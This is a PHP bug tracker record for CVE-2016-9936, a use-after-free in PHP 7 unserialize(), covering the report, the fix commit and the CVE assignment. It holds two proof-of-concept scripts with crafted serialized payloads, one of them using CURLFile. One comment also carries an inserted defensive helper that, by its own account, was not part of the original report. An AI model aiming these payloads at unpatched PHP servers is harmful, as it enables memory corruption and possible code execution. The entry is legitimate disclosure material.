Sec Bug #72978 Use After Free in PHP7 unserialize()
Submitted: 2016-08-30 15:56 UTC Modified: 2016-12-13 11:52 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 7.0.10 OS:
Private report: No CVE-ID: 2016-9936
 [2016-08-30 15:56 UTC] taoguangchen at icloud dot com
Description:
------------
PoC:
```
<?php

class obj1 implements Serializable {
    var $data;
    function serialize() {
        return serialize($this->data);
    }
    function unserialize($data) {
        $this->data = unserialize($data);
    }
}

class obj2 {
    var $ryat;
    function __wakeup() {
        $this->ryat = null;
    }
}

$inner = 's:4:"ryat";';
$exploit = 'a:2:{i:0;C:4:"obj1":'.strlen($inner).':{'.$inner.'}i:1;O:4:"obj2":1:{s:4:"ryat";R:3;}}';
$data = unserialize($exploit);
for ($i = 0; $i < 5; $i++) {
    $v[$i] = 'hi'.$i;
}
var_dump($data);

?>
```
 [2016-09-22 15:31 UTC] taoguangchen at icloud dot com
This bug can be triggered with CURLFile::__wakeup()

PoC:
```
<?php

class obj implements Serializable {
	var $data;
	function serialize() {
		return serialize($this->data);
	}
	function unserialize($data) {
		$this->data = unserialize($data);
	}
}

$inner = 's:4:"ryat";';
$exploit = 'a:2:{i:0;C:3:"obj":'.strlen($inner).':{'.$inner.'}i:1;O:8:"CURLFile":1:{s:4:"name";R:3;}}';
try {
	unserialize($exploit);
} catch (Exception $e) {
	var_dump($e->getMessage());
}
for ($i = 0; $i < 5; $i++) {
	$v[$i] = 'hi'.$i;
}

?>
```
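Both PoCs above reach the freed memory only because unserialize() instantiates a Serializable class (the `C:` entry, whose unserialize() method runs a nested unserialize()) and then an object whose `__wakeup()` runs. As an added defensive example, not taken from the report or from php-src, the helper below decodes untrusted data with the PHP 7.0+ `allowed_classes` option set to `false`, so no class method is ever invoked, and then rejects any payload that still carried object entries (they surface as `__PHP_Incomplete_Class`). The hostile sample is constructed here with the same shape as the first PoC.

```php
<?php
// Recursively report whether a decoded value still contains any object.
// Under allowed_classes => false every O:/C: entry becomes
// __PHP_Incomplete_Class, so any object at all means the payload tried
// to smuggle in classes and should not be trusted.
function contains_object($value): bool {
    if (is_object($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $item) {
            if (contains_object($item)) {
                return true;
            }
        }
    }
    return false;
}

// Decode untrusted serialized data without running Serializable::unserialize()
// or __wakeup() on anything, then refuse payloads that contained objects.
// The @ only silences the notices unserialize() emits for malformed or
// disallowed entries; the decision is made on the return value.
function safe_unserialize(string $payload) {
    $value = @unserialize($payload, ['allowed_classes' => false]);
    // serialize(false) is 'b:0;', the one legitimate input that decodes to false
    if ($value === false && $payload !== 'b:0;') {
        throw new UnexpectedValueException('malformed serialized data');
    }
    if (contains_object($value)) {
        throw new UnexpectedValueException('serialized data contains objects');
    }
    return $value;
}

// Constructed inputs: plain array data, and a payload shaped like the PoC
// (a C: Serializable entry followed by an O: entry holding a back-reference R:3).
$benign  = serialize(['user' => 'alice', 'roles' => ['editor']]);
$inner   = 's:4:"ryat";';
$hostile = 'a:2:{i:0;C:4:"obj1":'.strlen($inner).':{'.$inner.'}i:1;O:4:"obj2":1:{s:4:"ryat";R:3;}}';

var_dump(safe_unserialize($benign));
try {
    safe_unserialize($hostile);
} catch (UnexpectedValueException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Whether the hostile payload is rejected as malformed (an `R:` reference that no longer resolves) or as object-bearing depends on how unserialize() lays out the var_hash without the nested call; either branch refuses it before any user code runs.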
 [2016-11-08 13:47 UTC] taoguangchen at icloud dot com
I think this issue has been fixed in master/7.0:

https://github.com/php/php-src/commit/b2af4e8868726a040234de113436c6e4f6372d17
 [2016-11-16 06:20 UTC] stas@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: stas
 [2016-11-16 06:20 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

For Windows:

http://windows.php.net/snapshots/

Thank you for the report, and for helping us make PHP better.

Closing accordingly.
 [2016-11-16 06:21 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2016-11-16 06:21 UTC] stas@php.net
Looks like needing a CVE since triggering code is pretty common.
 [2016-12-12 09:37 UTC] kaplan@php.net
This issue isn't mentioned in 7.0.14 changelog.
 [2016-12-13 11:52 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2016-9936
 [2016-12-13 11:52 UTC] kaplan@php.net
Use CVE-2016-9936. The b2af4e8868726a040234de113436c6e4f6372d17 commit
message is "Complete the fix of bug #70172 for PHP 7." Because 70172
is referenced by CVE-2015-6834, it is possible to say that
CVE-2016-9936 exists because of an incomplete fix for CVE-2015-6834.